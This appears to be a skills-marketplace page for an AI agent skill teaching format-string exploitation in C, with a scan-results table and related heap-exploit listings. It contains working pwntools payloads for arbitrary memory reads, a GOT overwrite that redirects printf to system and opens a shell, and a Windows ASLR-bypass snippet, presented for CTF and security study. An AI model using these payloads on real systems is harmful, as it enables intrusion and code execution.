abelrguezr/format-string-exploit
skills/binary-exploitation/format-strings/format-strings/SKILL.md
How to exploit format string vulnerabilities in C programs. Use this skill whenever the user mentions format strings, printf vulnerabilities, sprintf/fprintf issues, GOT overwrites, arbitrary memory read/write, stack leaks, or any C program that takes user input as a format string. Also trigger for CTF challenges involving format string bugs, pwn tasks with printf-family functions, or when analyzing binaries for format string vulnerabilities.
$ install --global
skillsauthnpx skillsauth add abelrguezr/hacktricks-skills format-string-exploitInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 16, 2026, 2:09 AM11.3s2 files scanned
SKILL.md
- name:
- format-string-exploit
- description:
- How to exploit format string vulnerabilities in C programs. Use this skill whenever the user mentions format strings, printf vulnerabilities, sprintf/fprintf issues, GOT overwrites, arbitrary memory read/write, stack leaks, or any C program that takes user input as a format string. Also trigger for CTF challenges involving format string bugs, pwn tasks with printf-family functions, or when analyzing binaries for format string vulnerabilities.
Format String Exploitation
Format string vulnerabilities occur when user-controlled input is passed as the format string argument to printf-family functions (printf, sprintf, fprintf). This allows attackers to read from and write to arbitrary memory addresses.
Core Concepts
Why This Works
The printf function expects a format string as its first parameter, followed by values to substitute. When an attacker controls the format string, they can:
- Read memory: Use formatters like
%x,%s,%pto leak stack values - Write memory: Use
%nto write the number of bytes printed to an address - Control execution: Overwrite function pointers in the GOT to redirect execution
Key Formatters
| Formatter | Purpose |
|-----------|----------|
| %x | Print 4 bytes as hex |
| %08x | Print 8 hex bytes (padded) |
| %d | Print as integer |
| %s | Print as string (reads from address) |
| %p | Print pointer address |
| %n | Write byte count to address |
| %hn | Write 2 bytes to address |
| %<n>$x | Direct parameter access (nth argument) |
| %<n>$s | Read string from nth parameter address |
| %<n>$n | Write to nth parameter address |
Finding the Offset
Before exploiting, you need to find where your input lands on the stack. Send a known pattern followed by format specifiers and increment until you see your pattern.
Use the script: scripts/find_offset.py automates this process.
# Manual approach
for i in range(1, 20):
payload = b"AAAA%" + str(i).encode() + b"$x"
# Send payload, check if "41414141" appears in output
Arbitrary Read
Use %<n>$s to read from an arbitrary address. The nth parameter should be the address you want to read.
Why this matters: You can leak:
- Binary base address (defeat ASLR)
- Canaries
- Encryption keys
- Sensitive data on the stack
Example:
from pwn import *
p = process('./vulnerable_binary')
# If input is at offset 6, and we want to read 0x8048000
payload = b'%6$s' # Read string from 6th param
payload += b'xxxx' # Padding (5th param)
payload += p32(0x8048000) # 6th param = address to read
p.sendline(payload)
print(p.clean()) # Shows memory at 0x8048000
Arbitrary Write
The %n formatter writes the number of bytes printed so far to an address. To write arbitrary values:
- Use padding:
%.<count>xprints exactly<count>hex characters - Use
%hn: Write only 2 bytes (useful for 32-bit addresses) - Write in two steps: Low bytes first, then high bytes
Why two steps: Writing a full 32-bit address like 0x08049724 would require printing 134,000,000+ characters. Using %hn twice (2 bytes each) is much more efficient.
GOT Overwrite Pattern:
The Global Offset Table (GOT) contains addresses of external functions. Overwriting a GOT entry redirects function calls.
Use the script: scripts/got_overwrite_template.py for a ready-to-use template.
from pwn import *
elf = context.binary = ELF('./vulnerable_binary')
libc = elf.libc
p = process()
# Overwrite printf's GOT entry with system's address
payload = fmtstr_payload(offset, {elf.got['printf']: libc.sym['system']})
p.sendline(payload)
# Now printf() calls system()
p.sendline('/bin/sh')
p.interactive()
Windows x64 ASLR Bypass
On Windows x64, the first 4 parameters are in registers (RCX, RDX, R8, R9). When a format string is used without varargs, %p reads from R9, often leaking a stable pointer.
Use the script: scripts/windows_aslr_bypass.py for this technique.
Why this works: The leaked pointer has a known offset within the module. Subtract the offset to get the base address, then calculate all other addresses.
# Leak R9 via %p
leaked = int(received_output, 16)
base = leaked - KNOWN_OFFSET # Found during local reversing
Common Vulnerable Patterns
Vulnerable:
char buffer[30];
gets(buffer); // User input
printf(buffer); // DANGEROUS: buffer as format string
Safe:
char buffer[30];
gets(buffer);
printf("%s", buffer); // Safe: format string is constant
Exploitation Workflow
- Identify the vulnerability: User input → printf-family function
- Find the offset: Use
scripts/find_offset.py - Determine protection status: Check for ASLR, canary, RELRO, PIE
- Choose attack:
- No ASLR: Direct GOT overwrite
- ASLR enabled: Leak address first, then overwrite
- Craft payload: Use
fmtstr_payload()or manual construction - Test and iterate: Adjust offsets and addresses as needed
Scripts Available
scripts/find_offset.py- Brute force stack offsetscripts/got_overwrite_template.py- GOT overwrite exploit templatescripts/windows_aslr_bypass.py- Windows x64 ASLR bypass
References
- HackTricks Format Strings
- CTF Recipes - Data Leak
- GuyInATuxedo Format String Series
- ir0nstone Notes
Related Skills
abelrguezr/house-of-lore-exploit
testing
VerifiedTrustedCommunity
How to perform a House of Lore (small bin attack) heap exploitation. Use this skill whenever the user mentions heap exploitation, small bin attacks, fake chunks, glibc heap vulnerabilities, or needs to insert fake chunks into small bins for arbitrary read/write. Trigger for CTF challenges involving heap corruption, glibc 2.31+ exploitation, or when the user needs to bypass malloc sanity checks using fake chunk linking.
5SKILL.mdUpdated Apr 16, 2026
abelrguezr/house-of-force-exploit
testing
VerifiedTrustedCommunity
How to perform House of Force heap exploitation attacks. Use this skill whenever the user mentions heap exploitation, House of Force, top chunk manipulation, arbitrary memory allocation, malloc manipulation, or wants to allocate chunks at specific addresses. Also trigger for CTF challenges involving heap overflows, top chunk size overwrites, or when the user needs to calculate evil_size for heap attacks. Make sure to use this skill for any binary exploitation task involving glibc heap manipulation, even if they don't explicitly say "House of Force".
5SKILL.mdUpdated Apr 16, 2026
abelrguezr/house-of-einherjar
tools
VerifiedTrustedCommunity
How to perform House of Einherjar heap exploitation to allocate memory at arbitrary addresses. Use this skill whenever the user mentions heap exploitation, glibc heap attacks, arbitrary memory allocation, off-by-one overflow exploitation, tcache poisoning, fast bin attacks, or any CTF challenge involving heap manipulation. This is essential for binary exploitation tasks where you need to control malloc() return addresses.
5SKILL.mdUpdated Apr 16, 2026
abelrguezr/heap-overflow-exploitation
testing
VerifiedTrustedCommunity
How to identify, analyze, and exploit heap overflow vulnerabilities in binary exploitation challenges and real-world scenarios. Use this skill whenever the user mentions heap overflows, memory corruption, heap grooming, tcache poisoning, fast-bin attacks, or any heap-related vulnerability in CTF challenges, binary analysis, or security research. This skill covers heap overflow fundamentals, exploitation techniques, heap grooming strategies, and real-world CVE analysis.
5SKILL.mdUpdated Apr 16, 2026